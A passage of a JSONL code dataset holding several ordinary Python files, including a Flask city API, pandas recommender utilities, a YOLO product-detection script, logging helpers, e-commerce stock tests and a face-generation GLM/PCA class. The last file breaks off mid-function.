+{"seq_id":"223921684","text":"#!/usr/bin/python3\n\"\"\"routes of City \"\"\"\nfrom api.v1.views import app_views\nfrom flask import Flask, jsonify, abort, request\nfrom models import storage\nfrom models.city import City\nfrom models.state import State\n\n\n@app_views.route('/states//cities',\n strict_slashes=False, methods=['GET'])\ndef list_citys_of_a_states(state_id=None):\n \"\"\"search cities with states_id\"\"\"\n city_list = []\n state_obj = storage.get(State, state_id)\n\n if state_obj:\n for obj in state_obj.cities:\n city_list.append(obj.to_dict())\n return jsonify(city_list)\n else:\n abort(404)\n\n\n@app_views.route('/cities/', strict_slashes=False, methods=['GET'])\ndef list_a_city(city_id=None):\n \"\"\"search a city with city_id\"\"\"\n if city_id:\n city_obj = storage.get(City, city_id)\n\n if city_obj:\n return jsonify(city_obj.to_dict())\n else:\n abort(404)\n\n\n@app_views.route('/cities/', strict_slashes=False, methods=['DELETE'])\ndef del_a_city(city_id=None):\n \"\"\"delete cities with states_id\"\"\"\n if city_id:\n city_obj = storage.get(City, city_id)\n\n if city_obj:\n storage.delete(city_obj)\n storage.save()\n return (jsonify({})), 200\n else:\n abort(404)\n\n\n@app_views.route(\"/states//cities\", methods=[\"POST\"],\n strict_slashes=False)\ndef create_a_city(state_id=None):\n \"\"\"create a city\"\"\"\n if state_id is None:\n abort(404)\n\n get_state = storage.get(State, state_id)\n if get_state is None:\n abort(404)\n\n data = request.get_json(silent=True)\n if not data:\n return jsonify({'error': 'Not a JSON'}), 400\n\n if 'name' not in request.json:\n abort(400, 'Missing name')\n else:\n city_new = City(**data)\n city_new.state_id = state_id\n storage.new(city_new)\n storage.save()\n return jsonify(city_new.to_dict()), 201\n\n\n@app_views.route('/cities/', strict_slashes=False,\n methods=['PUT'])\ndef update_cities(city_id=None):\n \"\"\"Updates a City\"\"\"\n if city_id is None:\n abort(404)\n json = request.get_json(silent=True)\n if not json:\n return jsonify({'error': 'Not a JSON'}), 400\n\n cities_id = storage.get(City, city_id)\n if cities_id:\n for key, value in json.items():\n setattr(cities_id, key, value)\n storage.save()\n return jsonify(cities_id.to_dict()), 200\n else:\n abort(404)\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174297948","text":"def bubble(num):\n for i in range(len(num)-1,0,-1):\n for j in range(i):\n if num[j]>num[j+1]:\n t=num[j]\n num[j] = num[j+1]\n num[j+1] = t\n return num\n\n\n\nnum = []\nl = int(input(\"Enter number of elements : \"))\nfor i in range(0, l):\n ele = int(input('Enter the numbers : '))\n num.append(ele)\n\nprint(bubble(num))\n\n\n","sub_path":"BUBBLE_SORT.py","file_name":"BUBBLE_SORT.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165476033","text":"import pandas as pd\nimport numpy as np\nimport math\n\nfrom transform import *\n\n#dataset = pd.read_csv(\"./data/train_indessa.csv\")\ndataset = pd.read_csv(\"./data/test_indessa.csv\")\n\n#dataset = dataset.fillna(method='ffill')\n\n\ndef find():\n for c in dataset.columns:\n print(c)\n values = dataset[c].values.flatten().tolist()\n for v in values:\n s = str(v)\n if s.find('36 months') > -1:\n print(c, v)\n\ndef transform_term():\n t = dataset['term']\n t.transform(lambda x: int(x.split()[0]))\n\ndef check_float_cols():\n for col, typ in dataset.dtypes.to_dict().items():\n #print(col, typ)\n blank = False\n nan = False\n string = False\n\n #if typ == np.dtype('float64'):\n # print(col)\n\n for i in dataset[col]:\n if type(i) == str:\n string = True\n elif i == '':\n blank =True\n elif math.isnan(i):\n nan = True\n \n if string:\n print(col, \"strings\")\n\n if blank:\n print(col, \"blnaks\")\n\n if nan:\n print(col, \"nans\")\n \n\ndef transform(col, f):\n l = len(dataset[col])\n for i in range(0, l):\n dataset[col][i] = f(dataset[col][i])\n\ndataset = transform_dataset(dataset)\ncheck_float_cols()","sub_path":"hackerearth/bank_fears_loanliness/sol/common/scrub.py","file_name":"scrub.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93830461","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom reco_utils.common.constants import (\n DEFAULT_USER_COL,\n DEFAULT_ITEM_COL,\n DEFAULT_RATING_COL,\n DEFAULT_LABEL_COL\n)\n\n\ndef user_item_pairs(\n user_df,\n item_df,\n user_col=DEFAULT_USER_COL,\n item_col=DEFAULT_ITEM_COL,\n user_item_filter_df=None,\n shuffle=True,\n):\n \"\"\"Get all pairs of users and items data.\n\n Args:\n user_df (pd.DataFrame): User data containing unique user ids and maybe their features.\n item_df (pd.DataFrame): Item data containing unique item ids and maybe their features.\n user_col (str): User id column name.\n item_col (str): Item id column name.\n user_item_filter_df (pd.DataFrame): User-item pairs to be used as a filter.\n shuffle (bool): If True, shuffles the result.\n\n Returns:\n pd.DataFrame: All pairs of user-item from user_df and item_df, excepting the pairs in user_item_filter_df\n \"\"\"\n\n # Get all user-item pairs\n user_df[\"key\"] = 1\n item_df[\"key\"] = 1\n users_items = user_df.merge(item_df, on=\"key\")\n\n user_df.drop(\"key\", axis=1, inplace=True)\n item_df.drop(\"key\", axis=1, inplace=True)\n users_items.drop(\"key\", axis=1, inplace=True)\n\n # Filter\n if user_item_filter_df is not None:\n users_items = filter_by(users_items, user_item_filter_df, [user_col, item_col])\n\n if shuffle:\n users_items = users_items.sample(frac=1).reset_index(drop=True)\n\n return users_items\n\n\ndef filter_by(df, filter_by_df, filter_by_cols):\n \"\"\"From the input DataFrame (df), remove the records whose target column (filter_by_cols) values are\n exist in the filter-by DataFrame (filter_by_df)\n\n Args:\n df (pd.DataFrame): Source dataframe.\n filter_by_df (pd.DataFrame): Filter dataframe.\n filter_by_cols (iterable of str): Filter columns.\n\n Returns:\n pd.DataFrame: Dataframe filtered by filter_by_df on filter_by_cols\n \"\"\"\n\n return df.loc[\n ~df.set_index(filter_by_cols).index.isin(\n filter_by_df.set_index(filter_by_cols).index\n )\n ]\n\n\ndef libffm_converter(df, col_rating=DEFAULT_RATING_COL, filepath=None):\n \"\"\"Converts an input Dataframe (df) to another Dataframe (df) in libffm format. A text file of the converted\n Dataframe is optionally generated.\n\n Note:\n The input dataframe is expected to represent the feature data in the following schema\n |field-1|field-2|...|field-n|rating|\n |feature-1-1|feature-2-1|...|feature-n-1|1|\n |feature-1-2|feature-2-2|...|feature-n-2|0|\n ...\n |feature-1-i|feature-2-j|...|feature-n-k|0|\n Where\n 1. each \"field-*\" is the column name of the dataframe (column of lable/rating is excluded), and\n 2. \"feature-*-*\" can be either a string or a numerical value, representing the categorical variable or\n actual numerical variable of the feature value in the field, respectively.\n 3. If there are ordinal variables represented in int types, users should make sure these columns\n are properly converted to string type.\n\n The above data will be converted to the libffm format by following the convention as explained in\n https://www.csie.ntu.edu.tw/~r01922136/slides/ffm.pdf\n\n i.e., ::1 or ::, depending on\n the data type of the features in the original dataframe.\n\n Examples:\n >>> import pandas as pd\n >>> df_feature = pd.DataFrame({\n 'rating': [1, 0, 0, 1, 1],\n 'field1': ['xxx1', 'xxx2', 'xxx4', 'xxx4', 'xxx4'],\n 'field2': [3, 4, 5, 6, 7],\n 'field3': [1.0, 2.0, 3.0, 4.0, 5.0],\n 'field4': ['1', '2', '3', '4', '5']\n })\n\n >>> df_out = libffm_converter(df_feature, col_rating='rating')\n >>> df_out\n rating field1 field2 field3 field4\n 0 1 1:1:1 2:2:3 3:3:1.0 4:4:1\n 1 0 1:2:1 2:2:4 3:3:2.0 4:5:1\n 2 0 1:3:1 2:2:5 3:3:3.0 4:6:1\n 3 1 1:3:1 2:2:6 3:3:4.0 4:7:1\n 4 1 1:3:1 2:2:7 3:3:5.0 4:8:1\n\n Args:\n df (pd.DataFrame): input Pandas dataframe.\n col_rating (str): rating of the data.\n filepath (str): path to save the converted data.\n\n Return:\n pd.DataFrame: data in libffm format.\n \"\"\"\n df_new = df.copy()\n\n # Check column types.\n types = df_new.dtypes\n if not all([x == object or np.issubdtype(x, np.integer) or x == np.float for x in types]):\n raise TypeError(\"Input columns should be only object and/or numeric types.\")\n\n field_names = list(df_new.drop(col_rating, axis=1).columns)\n\n # Encode field-feature.\n idx = 1\n field_feature_dict = {}\n for field in field_names:\n if df_new[field].dtype == object:\n for feature in df_new[field].values:\n # Check whether (field, feature) tuple exists in the dict or not.\n # If not, put them into the key-values of the dict and count the index.\n if (field, feature) not in field_feature_dict:\n field_feature_dict[(field, feature)] = idx\n idx += 1\n\n def _convert(field, feature, field_index, field_feature_index_dict):\n if isinstance(feature, str):\n field_feature_index = field_feature_index_dict[(field, feature)]\n feature = 1\n else:\n field_feature_index = field_index\n\n return \"{}:{}:{}\".format(field_index, field_feature_index, feature)\n\n for col_index, col in enumerate(field_names):\n df_new[col] = df_new[col].apply(lambda x: _convert(col, x, col_index+1, field_feature_dict))\n\n # Move rating column to the first.\n field_names.insert(0, col_rating)\n df_new = df_new[field_names]\n\n if filepath is not None:\n np.savetxt(filepath, df_new.values, delimiter=' ', fmt='%s')\n\n return df_new\n\n\ndef negative_feedback_sampler(\n df, \n col_user=DEFAULT_USER_COL,\n col_item=DEFAULT_ITEM_COL,\n col_label=DEFAULT_LABEL_COL,\n ratio_neg_per_user=1,\n seed=42\n):\n \"\"\"Utility function to sample negative feedback from user-item interaction dataset.\n\n This negative sampling function will take the user-item interaction data to create \n binarized feedback, i.e., 1 and 0 indicate positive and negative feedback, \n respectively. \n\n Negative sampling is used in the literature frequently to generate negative samples \n from a user-item interaction data.\n See for example the neural collaborative filtering paper \n https://www.comp.nus.edu.sg/~xiangnan/papers/ncf.pdf\n \n Examples:\n >>> import pandas as pd\n >>> df = pd.DataFrame({\n 'userID': [1, 2, 3],\n 'itemID': [1, 2, 3],\n 'rating': [5, 5, 5]\n })\n >>> df_neg_sampled = negative_feedback_sampler(\n df, col_user='userID', col_item='itemID', ratio_neg_per_user=1\n )\n >>> df_neg_sampled\n userID itemID feedback\n 1 1 1\n 1 2 0\n 2 2 1\n 2 1 0\n 3 3 1\n 3 1 0\n\n Args:\n df (pandas.DataFrame): input data that contains user-item tuples.\n col_user (str): user id column name.\n col_item (str): item id column name.\n col_label (str): label column name. It is used for the generated columns where labels\n of positive and negative feedback, i.e., 1 and 0, respectively, in the output dataframe.\n ratio_neg_per_user (int): ratio of negative feedback w.r.t to the number of positive feedback for each user. \n If the samples exceed the number of total possible negative feedback samples, it will be reduced to the number\n of all the possible samples.\n seed (int): seed for the random state of the sampling function.\n\n Returns:\n pandas.DataFrame: data with negative feedback \n \"\"\"\n # Get all of the users and items.\n users = df[col_user].unique()\n items = df[col_item].unique()\n\n # Create a dataframe for all user-item pairs\n df_neg = user_item_pairs(pd.DataFrame(users, columns=[col_user]), pd.DataFrame(items, columns=[col_item]), user_item_filter_df = df)\n df_neg[col_label] = 0\n\n df_pos = df.copy()\n df_pos[col_label] = 1\n\n df_all = pd.concat([df_pos, df_neg], ignore_index=True, sort=True)\n df_all = df_all[[col_user, col_item, col_label]]\n\n # Sample negative feedback from the combined dataframe.\n df_sample = (\n df_all\n .groupby(col_user)\n .apply(\n lambda x: pd.concat(\n [\n x[x[col_label] == 1],\n x[x[col_label] == 0].sample(min(\n max(round(len(x[x[col_label] == 1])*ratio_neg_per_user), 1),\n len(x[x[col_label] == 0])\n ), random_state=seed, replace=False) if len(x[x[col_label] == 0] > 0) else pd.DataFrame({}, columns=[col_user, col_item, col_label])\n ], \n ignore_index=True,\n sort=True\n )\n )\n .reset_index(drop=True)\n .sort_values(col_user)\n )\n\n return df_sample\n","sub_path":"reco_utils/dataset/pandas_df_utils.py","file_name":"pandas_df_utils.py","file_ext":"py","file_size_in_byte":9338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"320784561","text":"#coding: utf-8\n\nimport os,sys\nfrom darknet import *\nimport cv2\nimport pdb\nfrom utils import *\nimport multiprocessing as mp\n\nfrom conf import *\n\n\n\"\"\"\nRun object detection on images, and get results\n\"\"\"\n\nclasses_id = ['image-p-qcshnt-268ml','image-p-xxwqaywsn-2h',\n 'image-p-xxwxjnn-4h','image-p-kkkl-330ml',\n 'image-p-hnwssgnyl-250ml*4','image-p-sdlwlcwt-4p',\n 'image-p-mncnn250ml','image-p-wtnmc-250ml',\n 'image-p-lfyswnc-280ml','image-p-hbahtkkwmyr-250ml',\n 'gcht','ynhlg',\n 'celxl-4','image-p-hyd-mnsnn-4h',\n 'image-p-nfnfccz-300ml','image-p-yydhgc235ml',\n 'image-p-mqtzyl-1h','image-p-nfsqcpyzlc-500ml']\n\nclass_id_blacklist = [10,11,12]\n\n# #######################\n# Util\n# #######################\nimport urllib\nimport numpy as np\n\ndef load_image_from_url(img_url):\n savepath = './tmp/img.jpg'\n\n # load from url\n data = urllib.urlopen(img_url).read()\n\n # cv2 format transfer\n img = np.asarray(bytearray(data),dtype=\"uint8\")\n img = cv2.imdecode(img,cv2.IMREAD_COLOR)\n\n # save image to ./tmp\n abspath = os.path.abspath(savepath)\n if os.path.exists(abspath):\n os.system('rm %s'%abspath)\n\n cv2.imwrite(abspath,img)\n\n return img,abspath\n\n# #######################\n# Goods Detect\n# #######################\nmodel_cfg_path = os.path.join(wd, 'material', 'cfg', 'missfresh-yolo-voc-800.cfg')\nmodel_weights_path = os.path.join(wd, 'material', 'yolo_models', 'missfresh-mix-yolo-voc-800', 'yolo-voc-800_2000.weights')\nmeta_path = os.path.join(wd, 'material', 'cfg', '%s' % data_info)\n# --init detector\nnet = load_net(model_cfg_path, model_weights_path, 0)\nmeta = load_meta(meta_path)\n\ndef goods_detect_urls(\n img_urls,\n yolo_cfg_path=model_cfg_path,\n yolo_weights_path=model_weights_path,\n good_info_path=meta_path,\n conf_thres=0.2\n):\n \"\"\"\n Performing goods detection on online images.\n\n :param img_urls:\n :param yolo_cfg_path:\n :param yolo_weights_path:\n :param good_info_path:\n :param conf_thres:\n :return:\n \"\"\"\n goods_det_results_dict = {}\n\n for url in img_urls:\n\n det_result = []\n\n _,im_path = load_image_from_url(url)\n im_path = os.path.abspath(im_path)\n res = detect(net, meta, im_path, thresh=conf_thres)\n\n # parse result\n for line in res:\n cls_name = line[0]\n cls = classes.index(cls_name)\n prob = line[1]\n bb = line[2]\n\n cls_id = classes_id[cls]\n\n #print(cls_id)\n\n if cls not in class_id_blacklist:\n det_result.append([cls_id,prob])\n\n goods_det_results_dict[url] = det_result\n\n #print goods_det_results_dict\n\n return goods_det_results_dict\n\n\nif __name__ == \"__main__\":\n\n urls = ['http://mall8.qiyipic.com/mall/20170605/fc/2e/mall_5934fa87ad8c1223bb3bfc2e_1x1.jpg']\n\n goods_detect_urls(urls)\n\n\n","sub_path":"goods_detect.py","file_name":"goods_detect.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445037750","text":"import os\nimport logging as log\nfrom datetime import datetime\nfrom shutil import copyfile\n\n\ncurrent_time = str(datetime.now().strftime('%Y%m%d_%H%M%S'))\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef set_log_params(log_file=None, level=log.DEBUG):\n\t\"\"\"\n\tSet logging parameters for task application\n\t:param log_file: Place to tail current logs. Defaults to None\n\t:param level: logging level. DEBUG, INFO, etc\n\t:return: None\n\t\"\"\"\n\tglobal current_time, dir_path\n\tif not log_file:\n\t\tlog_file = dir_path + \"/logs/latest.log\"\n\t\tif not os.path.exists(dir_path + '/logs/'):\n\t\t\tos.makedirs(dir_path + '/logs/')\n\t\tif os.path.exists(log_file):\n\t\t\tos.remove(log_file)\n\n\tlog.basicConfig(filename=log_file,\n\t format='%(levelname)s:%(asctime)s:%(filename)s:%(message)s',\n\t level=level)\n\tlog.info(\"Starting Task App Logger at %s\", current_time)\n\ndef move_latest_log_to_persistent_file():\n\t\"\"\"\n\tMoving the latest.log to time based logger file\n\t:return: None\n\t\"\"\"\n\tglobal current_time, dir_path\n\tsrc = dir_path + \"/logs/latest.log\"\n\tdst = dir_path + \"/logs/tasker_\" + current_time + \".log\"\n\tcopyfile(src, dst)\n","sub_path":"logger/loggen.py","file_name":"loggen.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"650112060","text":"from django import test\nimport mock\n\nfrom oscar.apps.catalogue import models\nfrom oscar.apps.partner.models import StockRecord\n\n\nclass TestAStandaloneProductIsAvailableToBuyWhen(test.TestCase):\n\n def test_its_product_class_does_not_track_stock(self):\n product_class = models.ProductClass(\n track_stock=False)\n product = models.Product(\n product_class=product_class)\n self.assertTrue(product.is_available_to_buy)\n\n def test_its_stockrecord_indicates_so(self):\n product_class = models.ProductClass()\n product = models.Product(\n id=-1, # Required so Django doesn't raise ValueError\n product_class=product_class)\n\n # Create mock version of a model that can be assigned as a FK\n record = mock.Mock(spec=StockRecord)\n record._state = mock.Mock()\n record._state.db = None\n record.is_available_to_buy = True\n product.stockrecord = record\n\n self.assertTrue(product.is_available_to_buy)\n\n\nclass TestAStandaloneProductIsNotAvailableToBuyWhen(test.TestCase):\n\n def test_it_has_no_stock_record(self):\n product_class = models.ProductClass()\n product = models.Product(\n id=-1,\n product_class=product_class)\n self.assertFalse(product.is_available_to_buy)\n\n def test_its_stockrecord_indicates_so(self):\n product_class = models.ProductClass()\n product = models.Product(\n id=-1,\n product_class=product_class)\n\n # Create mock version of a model that can be assigned as a FK\n record = mock.Mock(spec=StockRecord)\n record._state = mock.Mock()\n record._state.db = None\n record.is_available_to_buy = False\n product.stockrecord = record\n\n self.assertFalse(product.is_available_to_buy)\n","sub_path":"tests/integration/catalogue/availability_tests.py","file_name":"availability_tests.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183611399","text":"#!/usr/bin/env python\n\nimport gzip\nimport json\n\nFIXTURE_FILE = \"users-fixture-1.json.gz\"\n\n# To inspect, run:\n# gunzip -c badges-fixture-1.json.gz | less -S\n\nwith gzip.GzipFile(FIXTURE_FILE, 'r') as f: \n lines = f.readlines()\n\nj = json.loads(\"\\n\".join(lines))\n\n# Example json: [\n# {\n# \"fields\": {\n# \"activity\": 0,\n# \"badges\": 0,\n# \"pubkey\": \"1@lvh.me\",\n# \"flair\": \"\",\n# \"is_active\": true,\n# \"is_admin\": true,\n# \"is_staff\": true,\n# \"last_login\": \"2016-02-27T22:26:52.910Z\",\n# \"name\": \"Biostar Community\",\n# \"new_messages\": 0,\n# \"score\": 0,\n# \"site\": null,\n# \"status\": 1,\n# \"type\": 2\n# },\n# \"model\": \"users.user\",\n# \"pk\": 1\n# },\n\ncount = 0\nfor item in j:\n if \"uuid\" in item[\"fields\"]:\n\t del item[\"fields\"][\"uuid\"]\n\t count += 1\nprint(\"Num rows updated: {}\".format(count))\n\nwith gzip.GzipFile(FIXTURE_FILE, 'w') as f: \n f.write(\n json.dumps(j, indent=2)\n )\nprint(\"Overwrote file\")\n","sub_path":"writer/project-basedir/users/fixtures/002_remove_uuid.py","file_name":"002_remove_uuid.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568938571","text":"from __future__ import absolute_import, print_function\nimport h5py\nimport os\nimport os.path as op\nimport numpy as np\nfrom tqdm import tqdm\nfrom glob import glob\nfrom sklearn.preprocessing import OneHotEncoder, PolynomialFeatures\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.decomposition import PCA, NMF, FastICA\nfrom sklearn.discriminant_analysis import _cov\nfrom scipy.io import savemat\nfrom .utils import load_cinfo, get_scodes_given_criteria\n\n# Some global variables\ndata_path = op.join(op.dirname(__file__), 'data')\nDATA_LOCS = dict(\n v1=dict(vertices=op.join(data_path, 'vertices_v1.mat'),\n textures=op.join(data_path, 'textures_v1.mat')),\n v2=dict(vertices=op.join(data_path, 'vertices_v2.mat')),\n v2dense=dict(vertices=op.join(data_path, 'vertices_v2dense.mat'))\n)\n\nDATA_SHAPES = dict(\n v1=dict(vertices=(4735, 3), textures=(800, 600, 4)),\n v2=dict(vertices=(13780, 3)),\n v2dense=dict(vertices=(32493, 3))\n)\n\n\nclass FaceGenerator:\n \"\"\" Class to generate new faces.\n\n Parameters\n ----------\n version : str\n Version of the face-database (possibel: 'v1', 'v2', 'v2dense')\n save_dir : str\n Path to directory to save (intermediate) results to.\n \"\"\"\n\n def __init__(self, version='v1', save_dir=None):\n \"\"\" Initializes FaceGenerator object. \"\"\"\n self.version = version\n self.mods = list(DATA_LOCS[version].keys())\n if save_dir is None:\n self.save_dir = op.join(os.getcwd(), 'glm_data')\n else:\n self.save_dir = save_dir\n\n self.cinfo = None\n self.scodes = None\n self.fdata = dict(data=dict(),\n nz_mask=dict())\n self.iv_names = None\n\n def _load_hdf5(self, h5_file, scode, version='v1', mod='vertices'):\n \"\"\" Loads a dataset from hdf5 file. \"\"\"\n\n f = h5py.File(h5_file)\n data = np.array(f.get('%s/%i/%s' % (version, scode, mod)))\n\n if data.ndim == 3: # assume textures\n data = np.rollaxis(np.rollaxis(data, axis=0, start=3), axis=0, start=2)\n else:\n data = data.T\n\n f.close()\n return data\n\n def load(self, h5_file=None):\n \"\"\" Loads all necessary data (cinfo, shapes, textures).\n\n Parameters\n ----------\n h5_file : str\n Path to hdf5-file with all data.\n \"\"\"\n\n # Load demographic data (and clean it)\n cinfo = load_cinfo(version=self.version)\n cinfo = cinfo[['fm', 'age', 'WC', 'BA', 'EA', 'scode', 'gender']]\n cinfo = cinfo[(cinfo.WC + cinfo.BA + cinfo.EA) == 1]\n cinfo = cinfo[cinfo.gender.isin(['M', 'F'])]\n cinfo = cinfo[cinfo.age.between(0, 100)]\n cinfo = cinfo.dropna(how='any', axis=0)\n self.cinfo = cinfo\n self.scodes = cinfo.scode\n n_codes = len(self.scodes)\n\n if not op.isdir(self.save_dir):\n os.makedirs(self.save_dir)\n\n np.save(op.join(self.save_dir, 'scodes.npy'), self.scodes)\n\n # Load face-data (vertices/shapes)\n if h5_file is None:\n h5_file = op.join(op.dirname(__file__), 'data', 'all_data.h5')\n else:\n if not op.isfile(h5_file):\n raise ValueError(\"Could not find file %s!\" % h5_file)\n\n # Load in data (vertices/shapes)\n print(\"\\nLoading data ...\")\n for mod in self.mods:\n tmp = np.zeros(DATA_SHAPES.get(self.version)[mod] + (n_codes,))\n for i, scode in tqdm(enumerate(self.scodes), desc=mod):\n data = self._load_hdf5(h5_file, scode, self.version, mod=mod)\n tmp[..., i] = data\n\n # Remove all-zero stuff\n nz_mask = tmp.sum(axis=-1) != 0\n self.fdata['data'][mod] = tmp[nz_mask].T\n self.fdata['nz_mask'][mod] = nz_mask\n\n def fit_GLM(self, chunks=5):\n \"\"\" Fits a GLM to the shape/texture data.\n\n Parameters\n ----------\n chunks : int\n For large arrays (like the texture data), the GLM cannot be\n appropriately vectorized; `chunks` refers to the number of \"splits\"\n applied to the data. Only relevant when array > 1GB.\n \"\"\"\n\n if self.scodes is None:\n raise ValueError(\"You didn't load the data yet!\")\n\n # Only select subjects we got the data from\n cinfo = self.cinfo\n # One-hot encode gender\n ohe = OneHotEncoder(sparse=False)\n gender = ohe.fit_transform(cinfo.fm.values[:, np.newaxis])\n ethn = cinfo[['WC', 'BA', 'EA']].values\n age = cinfo.age.values[:, np.newaxis]\n icept = np.ones((age.size, 1))\n X = np.hstack((icept, gender, ethn, age))\n X = self._add_interactions(X)\n\n np.save(op.join(self.save_dir, 'IVs.npy'), X)\n self.iv_names = ['intercept', 'male', 'female', 'WC', 'BA', 'EA', 'age']\n\n # Now, define the data\n print(\"\\nStart GLM fitting ...\")\n for mod in self.mods:\n y = self.fdata['data'][mod]\n\n # We need this for later\n np.save(op.join(self.save_dir, '%s_nzmask.npy' % mod), self.fdata['nz_mask'][mod])\n\n if y.nbytes > 1e+9: # If the data is very large,split up in chunks\n if chunks == 1:\n print(\"Warning: attempting to fit millions of models at \"\n \"once ... Consider increasing `chunks`.\")\n\n iC = 1\n # Loop across chunks\n for tmp_y in tqdm(np.array_split(y, chunks, axis=1), 'chunk'):\n betas = np.linalg.lstsq(X, tmp_y, rcond=None)[0]\n yhat = X.dot(betas)\n residuals = tmp_y - yhat\n\n this_i = str(iC).rjust(3, '0')\n np.save(op.join(self.save_dir, '%s_residuals_raw_chunk%s.npy' % (mod, this_i)), residuals)\n np.save(op.join(self.save_dir, '%s_betas_chunk%s.npy' % (mod, this_i)), betas)\n np.save(op.join(self.save_dir, '%s_DVs_chunk%s.npy' % (mod, this_i)), tmp_y)\n iC += 1\n else:\n # Fit the models in one go\n betas = np.linalg.lstsq(X, y, rcond=None)[0]\n yhat = X.dot(betas)\n residuals = y - yhat\n\n # Write to disk\n np.save(op.join(self.save_dir, '%s_residuals_raw.npy' % mod), residuals)\n np.save(op.join(self.save_dir, '%s_betas.npy' % mod), betas)\n np.save(op.join(self.save_dir, '%s_DVs.npy' % mod), tmp_y)\n\n def run_decomposition(self, algorithm='pca', whiten=False, save_dir=None,\n **kwargs):\n \"\"\" Runs PCA on shape/texture residuals.\n\n Parameters\n ----------\n algorithm : str\n Decomposition algorithm ('pca', 'nmf', 'ica')\n whiten : bool\n Whether to whiten the data before decomposition (only relevant\n for 'pca' and 'ica')\n save_dir : str\n Path to directory with (intermediate) results. If None, path is\n inferred from self.\n kwargs : dict\n Extra arguments for decomposition algorithm\n \"\"\"\n print(\"\")\n if save_dir is None:\n save_dir = self.save_dir\n\n for mod in self.mods:\n\n residuals = self._load_chunks(mod, save_dir, 'residuals_raw')\n\n if algorithm == 'ica':\n scaler = StandardScaler()\n residuals = scaler.fit_transform(residuals)\n np.save(op.join(save_dir, '%s_residuals_means.npy' % mod), scaler.mean_)\n np.save(op.join(save_dir, '%s_residuals_stds.npy' % mod), scaler.scale_)\n if algorithm == 'nmf':\n scaler = MinMaxScaler()\n residuals = scaler.fit_transform(residuals)\n np.save(op.join(save_dir, '%s_residuals_mins.npy' % mod), scaler.min_)\n np.save(op.join(save_dir, '%s_residuals_scale.npy' % mod), scaler.scale_)\n print(\"Running decomposition (%s) on %s ...\" % (algorithm, mod))\n\n if algorithm == 'pca':\n decomp = PCA(copy=False, whiten=whiten, **kwargs)\n elif algorithm == 'nmf':\n # n_components set to keep comparable to PCA\n decomp = NMF(n_components=residuals.shape[0], **kwargs)\n elif algorithm == 'ica':\n decomp = FastICA(n_components=residuals.shape[0], **kwargs)\n else:\n raise ValueError(\"Please choose from 'pca', 'nmf', 'ica'.\")\n\n decomp.fit(residuals)\n resids_decomp = decomp.transform(residuals)\n np.save(op.join(save_dir, '%s_residuals_decomp.npy' % mod), resids_decomp)\n\n if algorithm == 'ica':\n # note: this is the mixing matrix (not components!)\n np.save(op.join(save_dir, '%s_decomp_comps.npy' % mod), decomp.mixing_)\n elif algorithm == 'pca':\n np.save(op.join(save_dir, '%s_decomp_means.npy' % mod), decomp.mean_)\n np.save(op.join(save_dir, '%s_decomp_comps.npy' % mod), decomp.components_)\n if whiten:\n np.save(op.join(save_dir, '%s_decomp_explvar.npy' % mod), decomp.explained_variance_)\n\n else: # must be NMF\n np.save(op.join(save_dir, '%s_decomp_comps.npy' % mod), decomp.components_)\n\n def change_property_face(self, scode, age=None, gender=None, ethn=None,\n save_dir=None):\n \"\"\" Changes the property of a given face (scode).\n\n Parameters\n ----------\n scode : int\n Face ID (code) of face to change\n age : int\n Desired age of face\n gender : str\n Desired gender of face ('M' or 'F')\n ethn : str\n Desired ethnicity of face ('WC', 'BA', or 'EA')\n save_dir : str\n Directory with (intermediate) results\n \"\"\"\n\n if save_dir is None:\n save_dir = self.save_dir\n\n idx = self._get_idx_of_scode(scode, save_dir)\n results = dict()\n\n print(\"\")\n for mod in self.mods:\n print(\"Changing property of face (%s) ...\" % mod)\n nz_mask = np.load(op.join(save_dir, '%s_nzmask.npy' % mod))\n betas = self._load_chunks(mod, save_dir, 'betas')\n resids = self._load_chunks(mod, save_dir, 'residuals_raw')[idx, :]\n norm_vec = self._generate_design_vector(gender, age, ethn)\n tmp_result = norm_vec.dot(betas) + resids\n tmp = np.zeros(DATA_SHAPES[self.version][mod])\n tmp[nz_mask] = np.squeeze(tmp_result)\n tmp = tmp.reshape(DATA_SHAPES[self.version][mod])\n results[mod] = tmp\n\n name = 'id-%i_gen-%s_age-%i_eth-%s.mat' % (scode, gender, age, ethn)\n out_path = op.join(save_dir, name)\n savemat(out_path, results)\n\n return out_path\n\n def generate_new_face(self, N, age, gender, ethn, age_range=20, algorithm='pca',\n dist='normal', whitened=False, shrinkage=False,\n save_dir=None):\n \"\"\" Generates a new face by randomly synthesizing PCA components,\n applying the inverse PCA transform, and adding the norm.\n\n Parameters\n ----------\n N : int\n How many new faces should be generated\n age : int\n Desired age of new face\n gender : str\n Desired gender of new face ('M' or 'F')\n ethn : str\n Desired ethnicity of new face ('WC', 'BA', 'EA')\n dist : str\n Distribution used to sample new values ('uniform', 'norm', 'mnorm')\n whitened : bool\n Was the data whitened before decomposition?\n shrinkage : bool\n Whether to apply shrinkage to covariance estimation of residuals.\n Only relevant when dist='mnorm'.\n save_dir : str\n Path to directory with (intermediate) results.\n \"\"\"\n\n if save_dir is None:\n save_dir = self.save_dir\n\n to_write = {i: dict() for i in range(N)}\n print(\"\")\n for mod in self.mods:\n print(\"Generating new faces (%s) ...\" % mod)\n decomp_comps 